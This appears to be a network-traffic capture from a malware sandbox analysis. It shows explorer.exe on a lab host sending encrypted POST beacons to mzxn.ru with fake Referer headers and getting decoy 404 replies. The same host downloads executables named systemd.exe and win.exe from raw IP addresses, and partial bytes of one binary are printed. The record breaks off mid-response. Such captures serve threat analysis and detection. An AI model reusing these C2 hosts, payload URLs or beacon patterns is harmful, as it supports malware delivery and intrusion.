Jul 27, 2024 07:43:27.458329916 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wathnngxbyoowmd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: mzxn.ru
Jul 27, 2024 07:43:27.458364964 CEST	363	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 62 4e d7 94 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA -[k,vubN}IQ];b;>n9d\u]+>'8]Sgx<WoH/9Gb9W"X6~$?DcDCUN?lm=34
Jul 27, 2024 07:43:28.524715900 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62240	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:28.534025908 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fcdtsqtavhskibhj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 134 Host: mzxn.ru
Jul 27, 2024 07:43:28.534059048 CEST	134	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 31 02 ad 8a Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu1OZi}okzV3}(o5C(d
Jul 27, 2024 07:43:29.559906960 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	62241	77.221.157.163	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:29.568747997 CEST	163	OUT	GET /systemd.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.221.157.163

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	62242	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:50.967586994 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gepaukacbiyo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: mzxn.ru
Jul 27, 2024 07:43:50.967633009 CEST	222	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 24 52 ce e2 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA -[k,vu$Rr-^pg%]8T(2DkKnIK\|WSK\|q'%+r%Y=W5jyvKGU'iU5
Jul 27, 2024 07:43:52.008378983 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	62243	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:52.045492887 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uuinbvqevufc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: mzxn.ru
Jul 27, 2024 07:43:52.045527935 CEST	231	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 37 4e d5 82 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu7NdCofjiRr/r1ZWb_>XI\LEwV/1k&?5x[q[Eu!.r"uuS0E
Jul 27, 2024 07:43:53.086966991 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:52 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	62244	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:53.096755981 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ewndxwxqsldh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: mzxn.ru
Jul 27, 2024 07:43:53.096772909 CEST	214	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 31 1a a1 e1 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA -[k,vu1a/oDRvYLuwTU#"]`JZ]A7l5,]P\|.ApctZ Ea(uT9An{
Jul 27, 2024 07:43:54.137245893 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	62246	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:54.145603895 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pcatlfkkstdxqqw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: mzxn.ru
Jul 27, 2024 07:43:54.145603895 CEST	286	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 43 05 de 95 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA -[k,vuCTJrcbaW*0Qt j{v5>n2A<e^Sk<3qG0mS9%$:72:MXR@l{vqO
Jul 27, 2024 07:43:55.209892035 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	62247	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:55.218795061 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cxcsmobdatpu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: mzxn.ru
Jul 27, 2024 07:43:55.218807936 CEST	266	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 22 0f b7 86 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA -[k,vu"$UwgcEvA/rh?iU5]D)$iM$LN2sQVazrPV#!pgjeq}Tdr*f0/
Jul 27, 2024 07:43:56.291183949 CEST	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	62248	64.190.113.113	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:56.299813986 CEST	159	OUT	GET /win.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 64.190.113.113
Jul 27, 2024 07:43:56.878726959 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:43:56 GMT Server: Apache Last-Modified: Mon, 22 Jul 2024 19:29:34 GMT ETag: "f1600-61ddb109e6b16" Accept-Ranges: bytes Content-Length: 988672 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdlZA"\Z@p`xD`X.text `.rdataPL@@.data0 @.CRTP@@.relocX`@B
Jul 27, 2024 07:43:56.878774881 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 57 Data Ascii: AWAVAUATVWUSHH-Xl$(D5QDt$0D$(D$48AcqAqw3A]Uqw3fffff.=#Y=8=\|(=/2t=uL$&D$'0GwAE
Jul 27, 2024 07:43:56.878810883 CEST	1236	IN	Data Raw: d2 0f 44 f7 45 84 c9 0f 44 f7 66 90 81 fe 89 ee d9 12 7f 78 81 fe 3a c2 31 ce 0f 8f fc 00 00 00 81 fe 05 3b ec ae 0f 8f 0c 02 00 00 81 fe 5d 9b 1e 9c 0f 8f d5 03 00 00 81 fe 3b d2 d3 8c 0f 8e 63 07 00 00 81 fe f8 a0 fd 96 0f 8e 29 0c 00 00 81 fe Data Ascii: DEDfx:1;];c)EC5uD$D$DL$hf\|K4@0\|:<6.:8:899: L$X
Jul 27, 2024 07:43:56.878846884 CEST	1236	IN	Data Raw: fb ff ff 81 fe 94 f4 98 0a 0f 8e d5 05 00 00 81 fe 06 5d 3b 0f 0f 8e c8 0a 00 00 81 fe 07 5d 3b 0f 0f 84 3d 13 00 00 81 fe 64 e5 f0 10 0f 84 4b 13 00 00 81 fe e1 5c 3f 11 0f 85 f9 fa ff ff 44 8b 8c 24 f8 00 00 00 44 0f af 8c 24 d0 01 00 00 45 89 Data Ascii: ];];=dK\?D$D$EAE!D$999Tv){*{"}V2~D$D$ D$D$$D$D$(DYAyA=I
Jul 27, 2024 07:43:56.878885984 CEST	1236	IN	Data Raw: f6 ff ff 81 fe 49 fa 3f 58 0f 8f bd 08 00 00 81 fe e3 62 e0 55 0f 84 5c 11 00 00 81 fe cd ae cd 56 0f 85 3d f6 ff ff 4c 8b 8c 24 50 02 00 00 45 0f b6 09 44 8b 74 24 2c 41 ff c6 44 8b 54 24 2c 47 88 0c 10 44 8b 8c 24 64 01 00 00 44 89 8c 24 c4 00 Data Ascii: I?XbU\V=L$PEDt$,ADT$,GD$dD$PG$DL$0D$/^^Y\|$F~_u\(DL$<D$D$ D$?}:E@?~DL$HAD$X
Jul 27, 2024 07:43:56.878920078 CEST	1236	IN	Data Raw: 44 89 8c 24 cc 00 00 00 e9 83 f1 ff ff 81 fe 88 fe 14 5e 0f 84 b6 0f 00 00 81 fe 10 59 3f 5f 0f 85 6b f1 ff ff 44 8b 0d 64 fe 0e 00 44 8b 15 61 fe 0e 00 44 89 94 24 90 01 00 00 45 8d 51 01 45 0f af d1 45 89 d1 41 83 f1 fe 45 21 d1 44 89 8c 24 94 Data Ascii: D$^Y?_kDdDaD$EQEEAE!D$1TOZD$DL$8D$DL$<DL$8AAh%AtDL$DL$ DL$8D$DL$<D$:CeE
Jul 27, 2024 07:43:56.878956079 CEST	776	IN	Data Raw: c1 44 89 8c 24 d8 01 00 00 44 8b 4c 24 68 46 0f b6 0c 09 44 88 4c 24 24 be 94 64 3b 6f e9 9a ec ff ff 81 fe a4 16 e3 71 0f 84 95 0e 00 00 81 fe 1c 4e 37 72 0f 85 82 ec ff ff be 5a 4e fa 05 e9 78 ec ff ff 81 fe 19 68 60 cc 0f 84 ad 0e 00 00 81 fe Data Ascii: D$DL$hFDL$$d;oqN7rZNxh`}`Vh%7%>4PDDD$EQEAD$VS{TD
Jul 27, 2024 07:43:56.878992081 CEST	1236	IN	Data Raw: ff ff 44 8b 4c 24 4c 41 ff c1 44 89 8c 24 64 01 00 00 be 64 e5 f0 10 e9 98 e9 ff ff 4c 8b 8c 24 68 02 00 00 46 0f b6 0c 09 45 01 c9 41 ff c1 44 89 8c 24 8c 00 00 00 44 8b 8c 24 e4 01 00 00 44 89 8c 24 88 00 00 00 be e3 62 e0 55 e9 63 e9 ff ff 4c Data Ascii: DL$LAD$ddL$hFEAD$D$D$bUcL$`EEAD$ZD$\|D$/D$E@D$A@@0<<^ju3TD$DL$XD$DL$\DL$8AAL6A
Jul 27, 2024 07:43:56.879025936 CEST	1236	IN	Data Raw: 44 8b 8c 24 88 00 00 00 44 89 8c 24 14 01 00 00 44 8b 4c 24 74 45 89 ca 41 81 f2 ff fe ff ff be 8d 40 a7 30 45 85 ca 74 05 be e0 af 8b 28 44 8b 8c 24 fc 00 00 00 4c 89 8c 24 18 01 00 00 44 8b 4c 24 74 44 89 8c 24 84 00 00 00 44 8b 8c 24 14 01 00 Data Ascii: D$D$DL$tEA@0Et(D$L$DL$tD$D$DL$\|D$AD$EAED$D$`AD$vsED$AD$D$Do0DD$\|$4?
Jul 27, 2024 07:43:56.879064083 CEST	1236	IN	Data Raw: be 3b c2 31 ce e9 02 e0 ff ff 44 8b 0d fb ec 0e 00 44 8b 15 f8 ec 0e 00 41 8d 79 01 41 0f af f9 f7 d7 83 cf fe 83 ff ff 41 0f 94 c1 41 83 fa 0a 40 0f 9c c6 44 30 ce be 4a fa 3f 58 41 b9 4a fa 3f 58 75 06 41 b9 70 fb e4 68 41 83 fa 0a 41 0f 4d f1 Data Ascii: ;1DDAyAAA@D0J?XAJ?XuAphAAMD$DT$D$DT$TAEDL$AD$Y?_zD$lD$D$pD$PD$AD$<62$\{TD$XD
Jul 27, 2024 07:43:56.886686087 CEST	1236	IN	Data Raw: 48 8b 45 e8 c6 40 0c 0c 48 8b 45 e8 c6 40 0d 0d 48 8b 45 e8 c6 40 0e 0e 48 8b 45 e8 c6 40 0f 0f 48 8b 45 e8 c6 40 10 10 48 8b 45 e8 c6 40 11 11 48 8b 45 e8 c6 40 12 12 48 8b 45 e8 48 83 c0 13 48 89 45 a8 b8 32 d5 d6 72 e9 ba fe ff ff 66 2e 0f 1f Data Ascii: HE@HE@HE@HE@HE@HE@HE@HEHHE2rf.=D==+=])pEU+AL0ADAE[ff.=Q5=?=@FMHUH AiH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	62249	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:57.844809055 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qnawhflyfaljta.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 334 Host: mzxn.ru
Jul 27, 2024 07:43:57.844809055 CEST	334	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 01 6b 2c 90 f4 76 0b 75 4c 24 fb 8f Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA ,[k,vuL$Iq^VMM?jdh)\:6,N4D$QhQStj-[IUVt{.`(6J`H[#scN,
Jul 27, 2024 07:43:58.888978004 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not 